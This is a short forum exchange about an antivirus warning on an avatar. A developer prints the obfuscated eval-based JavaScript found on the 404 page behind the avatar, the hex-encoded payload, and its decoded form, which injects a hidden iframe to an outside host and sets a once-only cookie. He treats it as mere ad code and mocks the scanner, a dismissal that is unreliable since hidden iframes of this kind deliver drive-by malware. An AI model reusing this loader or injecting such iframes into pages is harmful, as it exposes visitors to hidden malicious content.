Hmm, apparently someone's avatar has a trojan embedded in it according to my Avast. The img is from onipress and is named wlljicon3.gif, could be nothing but better safe then sorry...
Virus checkers are hilarious!
It's a 404 error page, because dustin's avatar is an external URL link but the gif in question has disappeared.
The error page does admittedly have a bit of obfuscated Javascript on it, but it doesn't take much inspection to see that it's equivalent to this:
function evalCode(str){
var result="";
for(i=0; i<str.length; i += 2) {
result+=( eval(String.fromCharCode+"(hexToInt(str.substr(i,2)))"));
}
eval(result);
}
evalCode("69662028646F63756D656E742E636F6F6B69652E73656172636828227168766C653D382229203D3D202D3129207B0A777A633D646F63756D656E742E676574456C656D656E7442794964282771646F27293B696628777A633D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71646F207372633D687474703A2F2F686F73746164732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20227168766C653D383B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
...with the encoded Javascript decoding to this...
if (document.cookie.search("qhvle=8") == -1) {
wzc=document.getElementById('qdo');if(wzc==null){document.write('<iframe id=qdo src=http://hostads.cn style=display:none></iframe>');}
document.cookie = "qhvle=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
Oh noes! It's going to make an ad! :-O
So I went to take a look at the page... and it didn't even make an ad after all that excitement. Maybe next time, eh?
Developer
